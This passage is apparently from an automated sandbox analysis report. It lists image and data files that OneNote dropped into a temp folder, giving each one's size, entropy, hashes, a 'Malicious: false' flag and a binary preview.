Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Temp\{38D76DDE-D24B-442D-8005-9B8DF70CCAF5}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Temp\{392DB918-C46E-4CE9-8609-DCD7AF90B7CC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Temp\{3A297710-4A9A-49DD-807F-6A2AFE385055}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6495930613726772
Encrypted:	false
SSDEEP:	6:RaRPvdlbYyfB3h1RRXUnf6m3tlrd2R2R2R2jK63+C6+WBRujlw//0lweI/4N+Wjm:RalYyf9/UfP1QQRIIWf/Wg
MD5:	122643195F67C49F7C61F1EC61186E3D
SHA1:	A0CC15C43265C42617C6F9E31C18101A2D69D866
SHA-256:	054651B5BDDF727F8631F237FAB6827303B421C1E5F00A67D95C3D99309E7EA9
SHA-512:	AAB85797F69467368EDEF0B8F1CC2FF02097B2B2217EEBF5F43AFD6519DB9F6EEC66B916F1DFC6AA59F9818C64AB4AFB2739528B9716B7887C92BB82242AA818
Malicious:	false
Preview:	./.C..vL....W"v_.....jL......*................?.....I...............................................................................................................h.............................................R....L....E@............bye..A.....................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{3C534FAC-B872-40B1-B10D-A63F2CB2F9AA}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6482137842159351
Encrypted:	false
SSDEEP:	6:RaWXYyfB3h1RRXUnfEd35lXcNoA5R2R2R2jKBvr9nrJRujlw//0lweI/2mnr7RuZ:RaaYyf9/UfEl5lsNofQQsl+Wf/2KS
MD5:	875B8DA07C136A5BC269DFD88ACA1AA8
SHA1:	B634C52B7E87CFD4E82F95C56D92CF2F95533B9B
SHA-256:	0551CBBF7168217D2ED24346826A31431A7E8916BAEBF3FE4DB5CBA4AF49B555
SHA-512:	05BD1EA51DAFC0346537C91F1C4E341E3395B1D7FF32AA9DD8532B32197349B46378C6C8A2533C370436AC6ECA5AC15E2F4C126DE9BA354738724215E048D611
Malicious:	false
Preview:	./.C..vL....W"v_$m.z.\.O....#..N................?.....I...............................................................................................................h.............................................Y.N..P.................^L.4... Di.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{3CD919A3-AF61-4D73-A957-DE3E9D676284}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Temp\{3CFE38E8-5C69-4B2F-922D-FD097FD8700E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Temp\{3D0F19A8-D06E-4053-8515-160E8BDC0600}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{3E7F20BD-3C0A-4D39-B808-8311CE8DB470}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Temp\{4029347E-479E-4DF4-9267-317889BE57EB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Temp\{43DBE1F5-E356-47BB-B1B8-86BA565728F0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{45F33DD1-B92B-46DF-86CE-9910B2F02453}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Temp\{465D444F-C574-44FB-B036-C2D5189CC068}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Temp\{46CA28FB-C9C2-426D-88C8-B077301ECBA0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Temp\{4B203B29-5F9B-4F1F-9792-51725C980847}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{4F5831CA-5E4B-42C0-A5A8-8C2491F12690}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Temp\{4F5AE5F1-A624-4452-9CE5-324DA3ECB134}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
